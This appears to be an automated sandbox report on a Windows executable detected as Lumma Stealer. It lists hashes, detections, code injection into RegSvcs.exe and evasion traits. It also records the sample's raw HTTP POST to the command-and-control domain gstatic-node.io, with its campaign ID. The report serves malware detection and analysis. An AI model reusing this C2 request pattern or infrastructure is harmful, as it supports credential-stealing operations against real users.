Edit tour

Windows Analysis Report
FT0uDS8neB.exe

Overview

General Information

Sample Name:	FT0uDS8neB.exe
Original Sample Name:	e6b8cfb15c6fce9abcea7a716345d537.exe
Analysis ID:	1293164
MD5:	e6b8cfb15c6fce9abcea7a716345d537
SHA1:	c56b60c650439c124b403e31aced45c584ecdd7b
SHA256:	6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277
Tags:	32exe
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Writes to foreign memory regions

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

FT0uDS8neB.exe (PID: 6640 cmdline: C:\Users\user\Desktop\FT0uDS8neB.exe MD5: E6B8CFB15C6FCE9ABCEA7A716345D537)

RegSvcs.exe (PID: 6672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)

WerFault.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 1012 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
FT0uDS8neB.exe	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x96640:$s2: is protected by an unregistered version of .NET Reactor!" );</script>

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.FT0uDS8neB.exe.ea0000.0.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x96640:$s2: is protected by an unregistered version of .NET Reactor!" );</script>

Snort Signatures

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Configuration Request Attempt - Source IP: 192.168.2.6 - Destination IP: 188.114.97.7

Timestamp:	192.168.2.6188.114.97.749718802046637 08/18/23-00:12:35.724385
SID:	2046637
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: FT0uDS8neB.exe	ReversingLabs: Detection: 29%
Source: FT0uDS8neB.exe	Virustotal: Detection: 42%			Perma Link

Antivirus detection for URL or domain

Source: http://gstatic-node.io/c2confLh	Avira URL Cloud: Label: malware
Source: http://gstatic-node.io/	Avira URL Cloud: Label: malware
Source: http://gstatic-node.io/f	Avira URL Cloud: Label: malware
Source: http://gstatic-node.io/c2conf	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: gstatic-node.io

Virustotal: Detection: 24%

Perma Link

Machine Learning detection for sample

Source: FT0uDS8neB.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_0042C500 _strlen,CryptStringToBinaryA,CryptStringToBinaryA,

1_2_0042C500

Source: FT0uDS8neB.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: FT0uDS8neB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RuDl.pdb source: FT0uDS8neB.exe, 00000000.00000002.247119434.0000000003311000.00000004.00001000.00020000.00000000.sdmp, FT0uDS8neB.exe, 00000000.00000002.247071121.00000000032C0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: vcruntime140_clr0400.i386.pdbGCTL source: FT0uDS8neB.exe, 00000000.00000002.270531529.00000000739A1000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: vertigorpgraptor.pdb source: FT0uDS8neB.exe
Source:	Binary string: mscorlib.pdb source: FT0uDS8neB.exe, 00000000.00000002.260438122.0000000072263000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: System.ni.pdbRSDS source: FT0uDS8neB.exe, 00000000.00000002.253372497.0000000070F8F000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: ucrtbase_clr0400.i386.pdb source: FT0uDS8neB.exe, 00000000.00000002.270050086.0000000072951000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: mscorlib.ni.pdb source: FT0uDS8neB.exe, 00000000.00000002.260438122.0000000072263000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS.TH source: FT0uDS8neB.exe, 00000000.00000002.260438122.0000000072263000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: System.Core.pdb source: FT0uDS8neB.exe, 00000000.00000002.250010489.0000000070581000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: vcruntime140_clr0400.i386.pdb source: FT0uDS8neB.exe, 00000000.00000002.270531529.00000000739A1000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS"f4v9 source: FT0uDS8neB.exe, 00000000.00000002.250010489.0000000070581000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: ucrtbase_clr0400.i386.pdbGCTL source: FT0uDS8neB.exe, 00000000.00000002.270050086.0000000072951000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: System.ni.pdb source: FT0uDS8neB.exe, 00000000.00000002.253372497.0000000070F8F000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: System.pdb source: FT0uDS8neB.exe, 00000000.00000002.253372497.0000000070F8F000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: System.Core.ni.pdb source: FT0uDS8neB.exe, 00000000.00000002.250010489.0000000070581000.00000020.00000001.01000000.00000008.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004493C8 FindFirstFileExW,		1_2_004493C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0044947C FindFirstFileExW,FindNextFileW,FindClose,FindClose,		1_2_0044947C

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h

0_2_05B7D230

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2046637 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Configuration Request Attempt 192.168.2.6:49718 -> 188.114.97.7:80

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic

HTTP traffic detected: POST /c2conf HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gstatic-node.ioContent-Length: 40Cache-Control: no-cacheData Raw: 6c 69 64 3d 5a 32 77 4b 43 6e 2d 2d 69 6e 73 74 61 6c 6c 73 32 70 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: lid=Z2wKCn--installs2p&j=default&ver=4.0

Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7
Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7

Source: RegSvcs.exe, 00000001.00000002.253094942.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gstatic-node.io/
Source: RegSvcs.exe, 00000001.00000002.253094942.000000000121B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.253094942.0000000001260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gstatic-node.io/c2conf
Source: RegSvcs.exe, 00000001.00000002.253094942.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gstatic-node.io/c2confLh
Source: RegSvcs.exe, 00000001.00000002.253094942.0000000001260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gstatic-node.io/f
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: RegSvcs.exe, 00000001.00000002.253094942.000000000126E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

Source: unknown

DNS traffic detected: queries for: gstatic-node.io

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_0042D2D9 GetProcAddress,InternetReadFile,GetModuleHandleW,InternetQueryDataAvailable,LdrInitializeThunk,_strlen,HttpSendRequestA,InternetQueryDataAvailable,GetProcAddress,HttpOpenRequestW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCloseHandle,GetProcAddress,GetProcAddress,InternetOpenW,InternetConnectA,

1_2_0042D2D9

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: TeslaBrowser/5.5Host: gstatic-node.io

Source: FT0uDS8neB.exe, 00000000.00000002.246368924.00000000015BB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: FT0uDS8neB.exe, type: SAMPLE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.0.FT0uDS8neB.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen

Source: FT0uDS8neB.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: FT0uDS8neB.exe, type: SAMPLE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.0.FT0uDS8neB.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 1012

Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_031651F8	0_2_031651F8
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_03165703	0_2_03165703
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_0316A970	0_2_0316A970
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_0316A980	0_2_0316A980
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_03168880	0_2_03168880
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_05A375B8	0_2_05A375B8
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_05B70006	0_2_05B70006
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_05B70040	0_2_05B70040
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_03160DE7	0_2_03160DE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00407AC0	1_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0042D2D9	1_2_0042D2D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00404845	1_2_00404845
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0043804F	1_2_0043804F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040E850	1_2_0040E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00426021	1_2_00426021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00410822	1_2_00410822
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00411942	1_2_00411942
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00418173	1_2_00418173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00432170	1_2_00432170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00435934	1_2_00435934
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0042F9D1	1_2_0042F9D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040F1E1	1_2_0040F1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004131B2	1_2_004131B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00414205	1_2_00414205
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041FA10	1_2_0041FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00440210	1_2_00440210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040F218	1_2_0040F218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00430A18	1_2_00430A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041722C	1_2_0041722C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00408ACA	1_2_00408ACA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041DAD0	1_2_0041DAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00403AFB	1_2_00403AFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040AAFD	1_2_0040AAFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00426ABC	1_2_00426ABC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00415361	1_2_00415361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00440B6B	1_2_00440B6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00414B7C	1_2_00414B7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040C31C	1_2_0040C31C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00416463	1_2_00416463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041D464	1_2_0041D464
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00438C13	1_2_00438C13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004294BC	1_2_004294BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0042C500	1_2_0042C500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041C5CA	1_2_0041C5CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004545EA	1_2_004545EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041A5F7	1_2_0041A5F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004365F4	1_2_004365F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040CD87	1_2_0040CD87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041E6DB	1_2_0041E6DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00410E8E	1_2_00410E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0042EF43	1_2_0042EF43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00446704	1_2_00446704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00409F24	1_2_00409F24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00427FC3	1_2_00427FC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0044EFC0	1_2_0044EFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004287EC	1_2_004287EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041379F	1_2_0041379F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0042EEA4 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00431A30 appears 51 times

Source: FT0uDS8neB.exe, 00000000.00000002.246368924.00000000015BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.247119434.0000000003311000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRuDl.dll* vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.253372497.000000007082E000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.253372497.000000007082E000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: LegalCopyright!OriginalFilename vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.253372497.000000007082E000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: get_OriginalFilename vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.253372497.000000007082E000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: originalFilename vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.253372497.000000007082E000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: SpecialBuild%File: %InternalName: %OriginalFilename: %FileVersion: %FileDescription: %Product: %ProductVersion: %Debug: %Patched: %PreRelease: %PrivateBuild: %SpecialBuild: %Language: vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.250010489.0000000070066000.00000020.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.270616677.00000000739B1000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamevcruntime140_clr0400.dll^ vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.247071121.00000000032C0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRuDl.dll* vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.270461768.00000000729F5000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenameucrtbase_clr0400.dll^ vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.247119434.00000000033E7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclrjit.dllT vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.247119434.00000000033E7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.247119434.00000000033E7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000000.241332087.0000000000EA2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamevertigorpgraptor.exeB vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs FT0uDS8neB.exe
Source: FT0uDS8neB.exe	Binary or memory string: OriginalFilenamevertigorpgraptor.exeB vs FT0uDS8neB.exe

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Section loaded: mscorjit.dll

Jump to behavior

Source: FT0uDS8neB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FT0uDS8neB.exe	ReversingLabs: Detection: 29%
Source: FT0uDS8neB.exe	Virustotal: Detection: 42%

Source: FT0uDS8neB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FT0uDS8neB.exe C:\Users\user\Desktop\FT0uDS8neB.exe
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 1012
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FT0uDS8neB.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE635.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.evad.winEXE@4/7@2/2

Source: FT0uDS8neB.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6672

Source: RegSvcs.exe

String found in binary or memory: Z2wKCn--installs2p

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: FT0uDS8neB.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: FT0uDS8neB.exe

Static file information: File size 1369600 > 1048576

Source: FT0uDS8neB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FT0uDS8neB.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x110000

Source: FT0uDS8neB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: FT0uDS8neB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: RuDl.pdb source: FT0uDS8neB.exe, 00000000.00000002.247119434.0000000003311000.00000004.00001000.00020000.00000000.sdmp, FT0uDS8neB.exe, 00000000.00000002.247071121.00000000032C0000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: vcruntime140_clr0400.i386.pdbGCTL source: FT0uDS8neB.exe, 00000000.00000002.270531529.00000000739A1000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: vertigorpgraptor.pdb source: FT0uDS8neB.exe
